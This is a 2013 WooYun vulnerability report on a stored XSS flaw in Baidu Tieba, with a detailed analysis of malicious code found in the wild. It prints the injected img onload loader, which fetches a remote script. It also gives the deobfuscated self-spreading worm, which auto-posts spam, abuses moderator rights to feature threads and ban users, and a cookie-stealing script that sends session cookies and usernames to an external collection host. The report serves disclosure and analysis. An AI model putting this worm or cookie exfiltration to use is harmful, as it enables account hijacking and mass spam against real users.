当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025777

漏洞标题:百度贴吧6月12日XSS漏洞,恶意代码细节分析

相关厂商:百度

漏洞作者: Christohper Meng

提交时间:2013-06-12 20:59

修复时间:2013-07-27 20:59

公开时间:2013-07-27 20:59

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-12: 细节已通知厂商并且等待厂商处理中
2013-06-15: 厂商已经确认,细节仅向厂商公开
2013-06-25: 细节向核心白帽子及相关领域专家公开
2013-07-05: 细节向普通白帽子公开
2013-07-15: 细节向实习白帽子公开
2013-07-27: 细节向公众公开

简要描述:

标签过滤不严

详细说明:

帖子里插入
<img class="BDE_Smiley" width="1" height="1" src="" text="nie85bgisn4i82y" onload="var script = document.createElement('script');
script.type = 'text/javascript';script.charset = 'utf-8';
script.setAttribute('text','xsspayloadtoken');
script.src = 'http://jsfile.duapp.com/timer.js';
document.body.appendChild(script)"">aaa
百度又疏忽不解释
载入http://jsfile.duapp.com/timer.js后,换eval为prompt解密如下:
var _$=["http://jsfile.duapp.com/payload.js", "祝各位吧友端午节快乐,玩的开心", "img[text="nie85bgisn4i82y"]", "script[text="xsspayloadtoken"]", "script", "text/javascript", "utf-8", "text", "xsspayloadtoken"]
var a=[new Date(0x7dd,0x5,0xc,0x11,0x28,0x0),new Date(0x7dd,0x5,0xc,0x15,0x1e,0x0)];
var a=[new Date(0x7dd,0x5,0xc,0x11,0x28,0x0),new Date(0x7dd,0x5,0xc,0x15,0x1e,0x0)];
var b=new Date();var c=PageData.user_name_url;if(b>a[0x0]&&b<a[0x1]){d(_$[0])}else{alert(_$[1])};
$(_$[2]).remove();
$(_$[3]).remove();function d(e){var f=document.createElement(_$[4]);f.type=_$[5];f.charset=_$[6];f.src=e;f.setAttribute(_$[7],_$[8]);
document.body.appendChild(f)}
载入的payload.js如下:
function makeit(a, b) {
c.fid = a,
c.kw = b,
$.post("http://tieba.baidu.com/f/commit/thread/add", c)
};
function scan(a, b) {
var c,
d,
e,
f,
g;
c = {
kw : PageData.forum.name,
ie : "utf-8",
fid : PageData.forum.id,
content : b,
tbs : PageData.tbs
},
d = function (a, b) {
var c = new XMLHttpRequest;
c.open("GET", a, !0),
c.responseType = "document",
c.onload = function () {
b(c.responseXML)
},
c.send()
},
e = function () {
d("/f?apage=1&kw=" + PageData.forum.name_url + "&t=" + (new Date).getTime(), function (a) {
$(a).find("li[data-field*='\"is_top\":1']").each(function () {
var a = JSON.parse(this.getAttribute("data-field"));
50 > a.reply_num && f(a.id, a.reply_num > 0)
})
})
},
f = function (b, c) {
d("http://tieba.baidu.com/p/" + b, function (d) {
0 === $(d).find('img[text="' + a + '"]').length && (c ? [].some.call($(d).find('.j_lzl_container:not([data-field$=""floor_num":"1"}"]) > div > .j_lzl_m_w'), function (a) {
return a.childElementCount >= 5 ? !0 : (g(b, JSON.parse(a.parentElement.parentElement.getAttribute("data-field")).pid), void 0)
}) && g(b) : g(b))
})
},
g = function (a, b) {
var d = Object(c);
d.tid = a,
b && (d.quote_id = b),
$.post("/f/commit/post/add", d)
},
e()
};
var f = {
kw : PageData.forum.name,
ie : "utf-8",
rich_text : "1",
floor_num : "1",
fid : PageData.forum.id,
tid : PageData.thread.id,
content : "\u697c\u4e3b\u7684\u5e16\u5b50\u8d5e\u4e00\u4e2a\uff01\uff01",
tbs : PageData.tbs,
mouse_pwd : "102,99,101,121,100,101,100,103,92,100,121,101,121,100,121,101,121,100,121,101,92,108,101,100,101,92,100,97,97,101,121,108,101,101,13709731144851",
mouse_pwd_t : "1370973114485",
mouse_pwd_isclick : "1",
lp_type : "0",
lp_sub_type : "0",
anonymous : "0",
tag : "11",
new_vcode : "1"
};
$.post("http://tieba.baidu.com/f/commit/post/add", f);
var c = rich_postor._getData();
c.prefix = "";
var content = ["\u8fd9\u4e2a\u95ee\u9898\uff0c\u6211\u4eec\u8981\u542c\u542c2\u697c\u7684\u610f\u89c1", "2\u697c\u662f\u6211\u7239\u7239", "\u6211\u662f\u672c\u5427\u7b2c\u4e00\u79d2\u6c89\u5e1d", "\u4e00\u697c\u9632\u541e", "\u5927\u5bb6\u665a\u5b89", "\u6211\u4ece1\u6570\u523020\uff0c\u6ca1\u4eba\u6253\u65ad\u6211\u5c31\u7761\u89c9", "\u597d\u7d2f\uff0c\u611f\u89c9\u4e0d\u4f1a\u518d\u7231\u4e86", "\u4e48\u4e48\u54d2", "\u98de\u8757\u829c\u6e56", "\u4e00\u697c\u5582\u718a"];
content = content[Math.floor(10 * Math.random())];
var title = ["\u4e00\u5bf9\u4e00\u8f7b\u677e\u52fe\u642d\u59b9\u5b50\u795e\u5668", "\u6211\u7231\u4e0a\u6211\u7537\u670b\u53cb\uff0c\u4ed6\u53c8\u4e0d\u7231\u6211\u4e86", "\u795d\u5927\u5bb6\u7aef\u5348\u8282\u5feb\u4e50", "\u795d\u5927\u5bb6\u7cbd\u5b50\u8282\u5feb\u4e50", "\u5427\u53cb\u4eec\u8282\u65e5\u5feb\u4e50\uff01"];
title = title[Math.floor(5 * Math.random())];
for (var blacklist = ["73787", "59099", "1206079"], blacklistkw = ["\u9b54\u517d\u4e16\u754c", "\u674e\u6bc5", "\u5b59\u7acb\u519b"], whitelist = ["635137", "1074587", "2262468", "2520908", "9046"], officialForum = ["153669", "1065858", "2917706", "898666", "2504636", "1882284", "813565", "1566944", "2331213", "3170781", "350911", "4536", "86209", "2118405", "1962969", "2177090", "746110", "154474", "3025434", "4035056", "1153798"], forumName = [], forumId = [], lf = PageData.user.user_forum_list.info.length, i = 0, j = 0; lf > i; i++)
PageData.user.user_forum_list.info[i].user_level > 4 && (whitelist.some(function (a) {
return a == PageData.user.user_forum_list.info[i].id
}) || officialForum.some(function (a) {
return a == PageData.user.user_forum_list.info[i].id
}) || (forumName[j] = PageData.user.user_forum_list.info[i].forum_name, forumId[j] = PageData.user.user_forum_list.info[i].id, j++));
var targetDate = [new Date(2013, 5, 12, 17, 50, 0), new Date(2013, 5, 12, 18, 10, 0)], presentTime = new Date;
for (presentTime > targetDate[0] && targetDate[1] > presentTime ? (c.title = "\u00b7\u00b7\u00b7\u590d\u4ec7\u4e4b\u9b42 \u94c1\u9a91\u8e0f\u8fc7\u00b7\u00b7\u00b7\u80a5\u9e2d\u964d\u4e34", c.content = '', c.content += "\u795d\u7206\u5427\u5927\u5e1d\u56fd\u5404\u4f4d \u53d7 \uff0c\u7aef\u5348\u8282\u5feb\u4e50,\u5475\u5475") : (c.content = '', c.content += content, c.title = title), i = 0; 3 > i; i++)
setTimeout("makeit('" + blacklist[i] + "','" + blacklistkw[i] + "')", 3e3 * i);
var slj = {
kw : "\u5b59\u7acb\u519b",
ie : "utf-8",
rich_text : "1",
floor_num : "0",
fid : "1206079",
tid : "0",
mouse_pwd : "36,34,32,58,35,36,35,46,31,39,58,38,58,39,58,38,58,39,58,38,58,39,58,38,58,39,58,38,31,36,35,47,33,37,36,31,39,34,34,38,58,47,38,38,13709733326221",
mouse_pwd_t : "1370973332622",
mouse_pwd_isclick : "1",
title : "\u8fd9\u5427\u91cc\u5c31\u4e00\u7fa4sb\u5475\u5475",
content : '\u65e5\u6f2b\u6bd4\u56fd\u6f2b\u597d\u4e86\u4e0d\u77e5\u9053\u591a\u5c11\u500d',
anonymous : "0",
tbs : PageData.tbs,
tag : "11",
new_vcode : "1"
};
for ($.post("http://tieba.baidu.com/f/commit/thread/add", slj), i = 0; forumName.length > i; i++)
setTimeout("makeit('" + forumId[i] + "','" + forumName[i] + "')", 2e3 * i);
if (PageData.power.user_roles.is_forum_manager) {
var d = {
ie : "utf-8",
tbs : PageData.tbs,
kw : PageData.forum.name,
fid : PageData.forum.id,
tid : PageData.thread.id,
cid : "0"
};
$.post("http://tieba.baidu.com/f/commit/thread/good/add", d),
setInterval("$.post('http://tieba.baidu.com/f/commit/thread/good/add',d);", 1200)
};
if (PageData.power.user_roles.is_forum_bawu || PageData.power.user_roles.is_forum_manager) {
var ee = {
ban_days : "1",
cm : "filter_forum_user",
fid : PageData.forum.id,
ie : "utf-8",
tbs : PageData.tbs,
user_name : PageData.user_name
};
$.post("http://tieba.baidu.com/bawu/cm", ee);
var LZ = JSON.parse(document.getElementsByClassName("l_post noborder")[0].getAttribute("data-field")),
ef = {
type : "1",
hide_un : LZ.author.name,
ie : "utf-8"
};
$.post("http://tieba.baidu.com/tphide/add", ef)
};
scan("nie85bgisn4i82y", '\u524d\u6392\u6324\u6324');
原来还有个gc.js的:
(function() {
(new Image()).src = 'http://xsserme.sinaapp.com/index.php?do=api&id=105eXB&location=' + escape((function() {
try {
return document.location.href
} catch (e) {
return ''
}
})()) + '&toplocation=' + escape((function() {
try {
return top.location.href
} catch (e) {
return ''
}
})()) + '&cookie=' + escape((function() {
try {
return document.cookie
} catch (e) {
return ''
}
})()) + '&opener=' + escape((function() {
try {
return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
} catch (e) {
return ''
}
})()) + '&username=' + escape((function() {
try {
return PageData.user_name
} catch (e) {
return ''
}
})());
})();
if ('1' == 1) {
keep = new Image();
keep.src = 'http://xsserme.sinaapp.com/index.php?do=keepsession&id=105eXB&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};
over

漏洞证明:

修复方案:

版权声明:转载请注明来源 Christohper Meng@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-06-15 23:04

厂商回复:

感谢反馈,已从其他渠道知晓并处理,谢谢

最新状态:

暂无